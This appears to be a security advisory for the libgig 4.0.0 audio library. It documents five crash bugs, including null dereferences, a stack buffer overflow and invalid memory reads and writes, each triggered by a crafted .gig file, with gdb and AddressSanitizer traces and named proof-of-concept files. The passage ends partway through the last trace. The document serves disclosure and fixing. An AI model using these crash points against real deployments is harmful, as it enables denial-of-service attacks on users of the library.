libgig is a C++ library for loading, modifying existing and creating new Gigasampler (.gig) files and DLS (Downloadable Sounds) Level 1/2 files, KORG sample based instruments (.KSF and .KMP files), SoundFont v2 (.sf2) files and AKAI sampler data.
Affected version:
=====
4.0.0
Vulnerability Description:
==========================
1.
the gig::Region::Region function in gig.cpp in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_null_pointer_dereference_1.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0,
pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
2970 if (file->pWavePoolTable) pDimensionRegions[i]->pSample = GetSampleFromWavePool(wavepoolindex);
(gdb) bt
#0 0x00007ffff7bc07df in gig::Region::Region (this=0x614ce0,
pInstrument=<optimized out>, rgnList=0x610230) at gig.cpp:2970
#1 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80,
pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdda0)
at gig.cpp:4404
#2 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#3 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#4 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#5 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble 0x00007ffff7bc07ca,0x00007ffff7bc07f0
Dump of assembler code from 0x7ffff7bc07ca to 0x7ffff7bc07f0:
0x00007ffff7bc07ca <gig::Region::Region(gig::Instrument*, RIFF::List*)+666>:je 0x7ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>
0x00007ffff7bc07cc <gig::Region::Region(gig::Instrument*, RIFF::List*)+668>:xor %edx,%edx
0x00007ffff7bc07ce <gig::Region::Region(gig::Instrument*, RIFF::List*)+670>:mov %eax,%esi
0x00007ffff7bc07d0 <gig::Region::Region(gig::Instrument*, RIFF::List*)+672>:mov %rbx,%rdi
0x00007ffff7bc07d3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+675>:mov 0x138(%r13),%r14
0x00007ffff7bc07da <gig::Region::Region(gig::Instrument*, RIFF::List*)+682>:callq 0x7ffff7b9ede0 <_ZN3gig6Region21GetSampleFromWavePoolEjPN4RIFF10progress_tE@plt>
=> 0x00007ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>:mov %rax,0x38(%r14)
0x00007ffff7bc07e3 <gig::Region::Region(gig::Instrument*, RIFF::List*)+691>:add $0x1,%ebp
0x00007ffff7bc07e6 <gig::Region::Region(gig::Instrument*, RIFF::List*)+694>:add $0x8,%r13
0x00007ffff7bc07ea <gig::Region::Region(gig::Instrument*, RIFF::List*)+698>:cmp %ebp,0x130(%rbx)
End of assembler dump.
(gdb) i r
rax 0x60ca906343312
rbx 0x614ce06376672
rcx 0x33
rdx 0x60a3006333184
rsi 0x00
rdi 0x6091606328672
rbp 0x00x0
rsp 0x7fffffffdcc00x7fffffffdcc0
r8 0x00
r9 0x22
r10 0x00
r11 0x246582
r12 0x6159506379856
r13 0x614ce06376672
r14 0x00
r15 0x00
rip 0x7ffff7bc07df0x7ffff7bc07df <gig::Region::Region(gig::Instrument*, RIFF::List*)+687>
eflags 0x10246[ PF ZF IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==40516== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000038 (pc 0x7f4f87126260 sp 0x7ffd0b22ec80 bp 0x600e0000c3b0 T0)
AddressSanitizer can not provide additional info.
#0 0x7f4f8712625f in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
#1 0x7f4f87127f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#2 0x7f4f87129fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#3 0x7f4f870fb6a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#6 0x7f4f86749ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970 gig::Region::Region(gig::Instrument*, RIFF::List*)
==40516== ABORTING
POC:
libgig_4.0.0_null_pointer_dereference_1.gig
CVE:
CVE-2017-12950
2.
the gig::DimensionRegion::CreateVelocityTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(stack buffer overflow and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_stack_buffer_overflow.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2884
2884 table[0] = 0;
(gdb) bt
#0 0x00007ffff7bb8b44 in gig::DimensionRegion::CreateVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2884
#1 0x00007ffff7bbf535 in gig::DimensionRegion::GetVelocityTable (
this=<optimized out>, curveType=<optimized out>, depth=<optimized out>,
scaling=<optimized out>) at gig.cpp:2054
#2 0x00007ffff7bbf6f3 in gig::DimensionRegion::GetCutoffVelocityTable (
this=this@entry=0x60d3f0, vcfVelocityCurve=<optimized out>,
vcfVelocityDynamicRange=<optimized out>, vcfVelocityScale=<optimized out>,
vcfCutoffController=<optimized out>) at gig.cpp:2042
#3 0x00007ffff7bbffa4 in gig::DimensionRegion::DimensionRegion (
this=0x60d3f0, pParent=<optimized out>, _3ewl=<optimized out>)
at gig.cpp:1617
#4 0x00007ffff7bc0464 in gig::Region::LoadDimensionRegions (
this=this@entry=0x60c3a0, rgn=rgn@entry=0x60b330) at gig.cpp:3075
#5 0x00007ffff7bc05fc in gig::Region::Region (this=0x60c3a0,
pInstrument=<optimized out>, rgnList=0x60b330) at gig.cpp:2923
#6 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60a280,
pFile=<optimized out>, insList=0x60a1a0, pProgress=0x7fffffffdd90)
at gig.cpp:4404
#7 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#8 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
---Type <return> to continue, or q <return> to quit---
this=this@entry=0x609160) at gig.cpp:5378
#9 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#10 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char):
...
0x00007ffff7bb8b27 <+2119>:mov 0x2e0(%rsp,%rdx,8),%rsi
0x00007ffff7bb8b2f <+2127>:je 0x7ffff7bb8c5c <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2428>
0x00007ffff7bb8b35 <+2133>:movzbl %bpl,%ebx
0x00007ffff7bb8b39 <+2137>:cvtsi2sd %ebx,%xmm6
0x00007ffff7bb8b3d <+2141>:movq $0x0,(%rax)
=> 0x00007ffff7bb8b44 <+2148>:mov 0x8(%rsi),%edi
0x00007ffff7bb8b47 <+2151>:lea 0x8(%rax),%rcx
---Type <return> to continue, or q <return> to quit---
0x00007ffff7bb8b4b <+2155>:mov 0xc(%rsi),%r10d
0x00007ffff7bb8b4f <+2159>:mov $0x1,%edx
...
(gdb) i r
rax 0x60e0506348880
rbx 0x1420
rcx 0x7ffff7669760140737344083808
rdx 0xfe254
rsi 0x2f736c6f6f742f633419195767971393379
rdi 0x22
rbp 0x00x0
rsp 0x7fffffffd8600x7fffffffd860
r8 0x60dbc06347712
r9 0x4064
r10 0x7fffffffd9f0140737488345584
r11 0x7ffff7bbf601140737349678593
r12 0x44
r13 0x60d7706346608
r14 0x60c3a06341536
r15 0x60c3a06341536
rip 0x7ffff7bb8b440x7ffff7bb8b44 <gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)+2148>
eflags 0x10246[ PF ZF IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb) x/20x $rsi+0x8
0x2f736c6f6f742f6b:Cannot access memory at address 0x2f736c6f6f742f6b
(gdb)
0x2f736c6f6f742f6f:Cannot access memory at address 0x2f736c6f6f742f6f
(gdb)
==40504== ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc9ca05fa0 at pc 0x7fbea070c58b bp 0x7ffc9ca051c0 sp 0x7ffc9ca051b8
READ of size 8 at 0x7ffc9ca05fa0 thread T0
#0 0x7fbea070c58a in gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2881
#1 0x7fbea0743964 in gig::DimensionRegion::GetVelocityTable(gig::curve_type_t, unsigned char, unsigned char) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2054
#2 0x7fbea0747739 in gig::DimensionRegion::DimensionRegion(gig::Region*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:1617
#3 0x7fbea074bfda in gig::Region::LoadDimensionRegions(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3075
#4 0x7fbea074c7d7 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2923
#5 0x7fbea074ef4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#6 0x7fbea0750fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#7 0x7fbea07226a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#8 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#9 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#10 0x7fbe9fd70ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#11 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
Address 0x7ffc9ca05fa0 is located at offset 144 in frame <PrintInstruments> of T0's stack:
This frame has 2 object(s):
[32, 40) 'name'
[96, 104) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/a/Documents/libgig-4.0.0/src/gig.cpp:2877 gig::DimensionRegion::CreateVelocityTable(gig::curve_type_t, unsigned char, unsigned char)
Shadow bytes around the buggy address:
0x100013938ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100013938bc0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938be0: 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2 00 f4
=>0x100013938bf0: f4 f4 f3 f3[f3]f3 00 00 00 00 00 00 00 00 00 00
0x100013938c00: 00 00 f1 f1 f1 f1 00 00 f4 f4 f3 f3 f3 f3 00 00
0x100013938c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100013938c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap righ redzone: fb
Freed Heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==40504== ABORTING
POC:
libgig_4.0.0_stack_buffer_overflow.gig
CVE:
CVE-2017-12951
3.
the LoadString function in helper.h in libgig 4.0.0 can cause a denial of service(Null pointer dereference and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_null_pointer_dereference_2.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
LoadString (s="", ck=0x6095d0) at helper.h:148
148 if (str[len] == '\0') break;
(gdb) bt
#0 LoadString (s="", ck=0x6095d0) at helper.h:148
#1 DLS::Info::LoadString (ChunkID=ChunkID@entry=1146241865,
lstINFO=lstINFO@entry=0x609330, s="") at DLS.cpp:307
#2 0x00007ffff7ba8095 in DLS::Info::Info (this=0x609220, list=<optimized out>)
at DLS.cpp:263
#3 0x00007ffff7ba8448 in DLS::Resource::Resource (this=this@entry=0x609160,
Parent=Parent@entry=0x0, lstResource=lstResource@entry=0x609090)
at DLS.cpp:448
#4 0x00007ffff7baaa02 in DLS::File::File (this=0x609160, pRIFF=0x609090)
at DLS.cpp:1435
#5 0x00007ffff7bbab2e in gig::File::File (this=0x609160,
pRIFF=<optimized out>) at gig.cpp:5201
#6 0x0000000000401ee4 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:70
(gdb) disassemble
Dump of assembler code for function DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&):
0x00007ffff7ba7f30 <+0>:push %rbp
0x00007ffff7ba7f31 <+1>:mov %edi,%eax
0x00007ffff7ba7f33 <+3>:mov %rsi,%rdi
0x00007ffff7ba7f36 <+6>:mov %eax,%esi
0x00007ffff7ba7f38 <+8>:push %rbx
0x00007ffff7ba7f39 <+9>:mov %rdx,%rbx
0x00007ffff7ba7f3c <+12>:sub $0x8,%rsp
0x00007ffff7ba7f40 <+16>:callq 0x7ffff7b9ed80 <_ZN4RIFF4List11GetSubChunkEj@plt>
0x00007ffff7ba7f45 <+21>:test %rax,%rax
0x00007ffff7ba7f48 <+24>:mov %rax,%rbp
0x00007ffff7ba7f4b <+27>:je 0x7ffff7ba7fa8 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+120>
0x00007ffff7ba7f4d <+29>:mov %rax,%rdi
0x00007ffff7ba7f50 <+32>:callq 0x7ffff7b9e3e0 <_ZN4RIFF5Chunk13LoadChunkDataEv@plt>
0x00007ffff7ba7f55 <+37>:mov 0xc(%rbp),%r10d
0x00007ffff7ba7f59 <+41>:mov %rax,%rsi
0x00007ffff7ba7f5c <+44>:test %r10d,%r10d
0x00007ffff7ba7f5f <+47>:jle 0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
---Type <return> to continue, or q <return> to quit---
=> 0x00007ffff7ba7f61 <+49>:cmpb $0x0,(%rax)
0x00007ffff7ba7f64 <+52>:je 0x7ffff7ba7faf <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+127>
0x00007ffff7ba7f66 <+54>:mov $0x1,%r9d
0x00007ffff7ba7f6c <+60>:xor %ecx,%ecx
0x00007ffff7ba7f6e <+62>:jmp 0x7ffff7ba7f7e <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+78>
0x00007ffff7ba7f70 <+64>:cmpb $0x0,(%rsi,%r9,1)
0x00007ffff7ba7f75 <+69>:lea 0x1(%r9),%r8
0x00007ffff7ba7f79 <+73>:je 0x7ffff7ba7fa0 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+112>
0x00007ffff7ba7f7b <+75>:mov %r8,%r9
0x00007ffff7ba7f7e <+78>:add $0x1,%ecx
0x00007ffff7ba7f81 <+81>:cmp %r10d,%ecx
0x00007ffff7ba7f84 <+84>:jne 0x7ffff7ba7f70 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+64>
0x00007ffff7ba7f86 <+86>:movslq %ecx,%rdx
0x00007ffff7ba7f89 <+89>:mov %rbx,%rdi
0x00007ffff7ba7f8c <+92>:callq 0x7ffff7b9f030 <_ZNSs6assignEPKcm@plt>
0x00007ffff7ba7f91 <+97>:add $0x8,%rsp
0x00007ffff7ba7f95 <+101>:mov %rbp,%rdi
0x00007ffff7ba7f98 <+104>:pop %rbx
0x00007ffff7ba7f99 <+105>:pop %rbp
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax 0x00
rbx 0x6092386328888
rcx 0x7ffff739f9f7140737341159927
rdx 0x7ffff5d9f000140737318088704
rsi 0x00
rdi 0x7ffff5d9f000140737318088704
rbp 0x6095d00x6095d0
rsp 0x7fffffffdd800x7fffffffdd80
r8 0xffffffff4294967295
r9 0x00
r10 0x100001a16777242
r11 0x247583
r12 0x6092206328864
r13 0x7fffffffdfa0140737488347040
r14 0x00
r15 0x6091a06328736
rip 0x7ffff7ba7f610x7ffff7ba7f61 <DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&)+49>
eflags 0x10202[ IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==41244== ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f260c0db52b sp 0x7fffc62477e0 bp 0x600e0000ded0 T0)
AddressSanitizer can not provide additional info.
#0 0x7f260c0db52a in LoadString /home/a/Documents/libgig-4.0.0/src/helper.h:148
#1 0x7f260c0db52a in DLS::Info::LoadString(unsigned int, RIFF::List*, std::string&) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:307
#2 0x7f260c0dbfcb in DLS::Info::Info(RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:263
#3 0x7f260c0dcf82 in DLS::Resource::Resource(DLS::Resource*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:448
#4 0x7f260c0ee958 in DLS::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/DLS.cpp:1435
#5 0x7f260c173e75 in gig::File::File(RIFF::File*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5201
#6 0x40275a in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:70
#7 0x7f260b7c3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/helper.h:148 LoadString
==41244== ABORTING
POC:
libgig_4.0.0_null_pointer_dereference_2.gig
CVE:
CVE-2017-12952
4.
the gig::Instrument::UpdateRegionKeyTable function in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory write and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_invalid_memory_write.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0) at gig.cpp:4445
4445 RegionKeyTable[iKey] = pRegion;
(gdb) bt
#0 gig::Instrument::UpdateRegionKeyTable (this=this@entry=0x60a1a0)
at gig.cpp:4445
#1 0x00007ffff7bc0b75 in gig::Instrument::Instrument (this=0x60a1a0,
pFile=<optimized out>, insList=0x60a0c0, pProgress=0x7fffffffdd90)
at gig.cpp:4409
#2 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#3 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#4 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#5 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::Instrument::UpdateRegionKeyTable():
0x00007ffff7bba240 <+0>:xor %eax,%eax
0x00007ffff7bba242 <+2>:nopw 0x0(%rax,%rax,1)
0x00007ffff7bba248 <+8>:movq $0x0,0x80(%rdi,%rax,1)
0x00007ffff7bba254 <+20>:add $0x8,%rax
0x00007ffff7bba258 <+24>:cmp $0x400,%rax
0x00007ffff7bba25e <+30>:jne 0x7ffff7bba248 <gig::Instrument::UpdateRegionKeyTable()+8>
0x00007ffff7bba260 <+32>:mov 0x60(%rdi),%r9
0x00007ffff7bba264 <+36>:mov (%r9),%r8
0x00007ffff7bba267 <+39>:cmp %r9,%r8
0x00007ffff7bba26a <+42>:je 0x7ffff7bba2a4 <gig::Instrument::UpdateRegionKeyTable()+100>
0x00007ffff7bba26c <+44>:nopl 0x0(%rax)
0x00007ffff7bba270 <+48>:mov 0x10(%r8),%rcx
0x00007ffff7bba274 <+52>:movzwl 0x78(%rcx),%eax
0x00007ffff7bba278 <+56>:movzwl 0x7a(%rcx),%esi
0x00007ffff7bba27c <+60>:cmp %esi,%eax
0x00007ffff7bba27e <+62>:jg 0x7ffff7bba29a <gig::Instrument::UpdateRegionKeyTable()+90>
0x00007ffff7bba280 <+64>:add $0x1,%esi
0x00007ffff7bba283 <+67>:nopl 0x0(%rax,%rax,1)
0x00007ffff7bba288 <+72>:movslq %eax,%rdx
---Type <return> to continue, or q <return> to quit---
0x00007ffff7bba28b <+75>:add $0x1,%eax
0x00007ffff7bba28e <+78>:cmp %esi,%eax
=> 0x00007ffff7bba290 <+80>:mov %rcx,0x80(%rdi,%rdx,8)
0x00007ffff7bba298 <+88>:jne 0x7ffff7bba288 <gig::Instrument::UpdateRegionKeyTable()+72>
0x00007ffff7bba29a <+90>:mov (%r8),%r8
0x00007ffff7bba29d <+93>:cmp %r8,%r9
0x00007ffff7bba2a0 <+96>:jne 0x7ffff7bba270 <gig::Instrument::UpdateRegionKeyTable()+48>
0x00007ffff7bba2a2 <+98>:repz retq
0x00007ffff7bba2a4 <+100>:repz retq
End of assembler dump.
(gdb) i r
rax 0x3fbd16317
rbx 0x60a1a06332832
rcx 0x60d5806346112
rdx 0x3fbc16316
rsi 0x420116897
rdi 0x60a1a06332832
rbp 0x7fffffffdd900x7fffffffdd90
rsp 0x7fffffffdd080x7fffffffdd08
r8 0x60e7406350656
r9 0x60b0f06336752
r10 0x7fffffffdad0140737488345808
r11 0x7ffff7bba240140737349657152
r12 0x00
r13 0x60a0c06332608
r14 0x60a9806334848
r15 0x60d5806346112
rip 0x7ffff7bba2900x7ffff7bba290 <gig::Instrument::UpdateRegionKeyTable()+80>
eflags 0x10283[ CF SF IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==43045== ERROR: AddressSanitizer: SEGV on unknown address 0x60460003dd80 (pc 0x7fb8f7cfcd88 sp 0x7ffcb179db10 bp 0x60460001f500 T0)
AddressSanitizer can not provide additional info.
#0 0x7fb8f7cfcd87 in gig::Instrument::UpdateRegionKeyTable() /home/a/Documents/libgig-4.0.0/src/gig.cpp:4444
#1 0x7fb8f7d2efe2 in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4409
#2 0x7fb8f7d30fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#3 0x7fb8f7d026a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#4 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#5 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#6 0x7fb8f7350ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#7 0x402e5c in _start (/home/a/Documents/libgig-4.0.0/src/tools/.libs/gigdump+0x402e5c)
SUMMARY: AddressSanitizer: SEGV /home/a/Documents/libgig-4.0.0/src/gig.cpp:4445 gig::Instrument::UpdateRegionKeyTable()
==43045== ABORTING
POC:
libgig_4.0.0_invalid_memory_write.gig
CVE:
CVE-2017-12953
5.
the gig::Region::GetSampleFromWavePool function in gig.cpp in gig.cpp in libgig 4.0.0 can cause a denial of service(invalid memory read and application crash) via a crafted gig file.
./gigdump libgig_4.0.0_invalid_memory_read.gig
----debug info:----
Program received signal SIGSEGV, Segmentation fault.
gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520,
WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
3849 unsigned long soughtoffset = file->pWavePoolTable[WavePoolTableIndex];
(gdb) bt
#0 gig::Region::GetSampleFromWavePool (this=0x609160, this@entry=0x612520,
WavePoolTableIndex=0, pProgress=pProgress@entry=0x0) at gig.cpp:3849
#1 0x00007ffff7bc07df in gig::Region::Region (this=0x612520,
pInstrument=<optimized out>, rgnList=0x6100f0) at gig.cpp:2970
#2 0x00007ffff7bc0b36 in gig::Instrument::Instrument (this=0x60ef80,
pFile=<optimized out>, insList=0x60eea0, pProgress=0x7fffffffdd90)
at gig.cpp:4404
#3 0x00007ffff7bc103e in gig::File::LoadInstruments (this=0x609160,
pProgress=0x0) at gig.cpp:5576
#4 0x00007ffff7bbade6 in gig::File::GetFirstInstrument (
this=this@entry=0x609160) at gig.cpp:5378
#5 0x000000000040533b in PrintInstruments (gig=gig@entry=0x609160)
at gigdump.cpp:205
#6 0x0000000000401f34 in main (argc=<optimized out>, argv=<optimized out>)
at gigdump.cpp:79
(gdb) disassemble
Dump of assembler code for function gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*):
0x00007ffff7bbac00 <+0>:cmp $0xffffffff,%esi
0x00007ffff7bbac03 <+3>:je 0x7ffff7bbac63 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+99>
0x00007ffff7bbac05 <+5>:push %r12
0x00007ffff7bbac07 <+7>:push %rbp
0x00007ffff7bbac08 <+8>:push %rbx
0x00007ffff7bbac09 <+9>:mov 0x18(%rdi),%rax
0x00007ffff7bbac0d <+13>:mov 0x18(%rax),%rbx
0x00007ffff7bbac11 <+17>:mov 0x78(%rbx),%rax
0x00007ffff7bbac15 <+21>:test %rax,%rax
0x00007ffff7bbac18 <+24>:je 0x7ffff7bbac5c <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+92>
0x00007ffff7bbac1a <+26>:mov %esi,%ecx
0x00007ffff7bbac1c <+28>:mov %rbx,%rdi
0x00007ffff7bbac1f <+31>:mov %rdx,%rsi
=> 0x00007ffff7bbac22 <+34>:mov (%rax,%rcx,4),%ebp
0x00007ffff7bbac25 <+37>:mov 0x80(%rbx),%rax
0x00007ffff7bbac2c <+44>:mov (%rax,%rcx,4),%r12d
0x00007ffff7bbac30 <+48>:callq 0x7ffff7b9e400 <_ZN3gig4File14GetFirstSampleEPN4RIFF10progress_tE@plt>
0x00007ffff7bbac35 <+53>:test %rax,%rax
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax 0x609f806332288
rbx 0x6091606328672
rcx 0xff0000004278190080
rdx 0x00
rsi 0x00
rdi 0x6091606328672
rbp 0x00x0
rsp 0x7fffffffdc900x7fffffffdc90
r8 0x00
r9 0x22
r10 0x00
r11 0x246582
r12 0x6131906369680
r13 0x6125206366496
r14 0x00
r15 0x00
rip 0x7ffff7bbac220x7ffff7bbac22 <gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*)+34>
eflags 0x10202[ IF RF ]
cs 0x3351
ss 0x2b43
ds 0x00
es 0x00
---Type <return> to continue, or q <return> to quit---
fs 0x00
gs 0x00
(gdb)
ASAN:SIGSEGV
=================================================================
==44028== ERROR: AddressSanitizer: SEGV on unknown address 0x6009fc00ed70 (pc 0x7fea916446ac sp 0x7ffd026ec040 bp 0x0c08c0003ea3 T0)
AddressSanitizer can not provide additional info.
#0 0x7fea916446ab in gig::Region::GetSampleFromWavePool(unsigned int, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:3850
#1 0x7fea91670247 in gig::Region::Region(gig::Instrument*, RIFF::List*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:2970
#2 0x7fea91671f4a in gig::Instrument::Instrument(gig::File*, RIFF::List*, RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:4404
#3 0x7fea91673fdc in gig::File::LoadInstruments(RIFF::progress_t*) /home/a/Documents/libgig-4.0.0/src/gig.cpp:5576
#4 0x7fea916456a0 in gig::File::GetFirstInstrument() /home/a/Documents/libgig-4.0.0/src/gig.cpp:5378
#5 0x40fca6 in PrintInstruments(gig::File*) /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:205
#6 0x4027aa in main /home/a/Documents/libgig-4.0.0/src/tools/gigdump.cpp:79
#7 0x7fea90c93ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
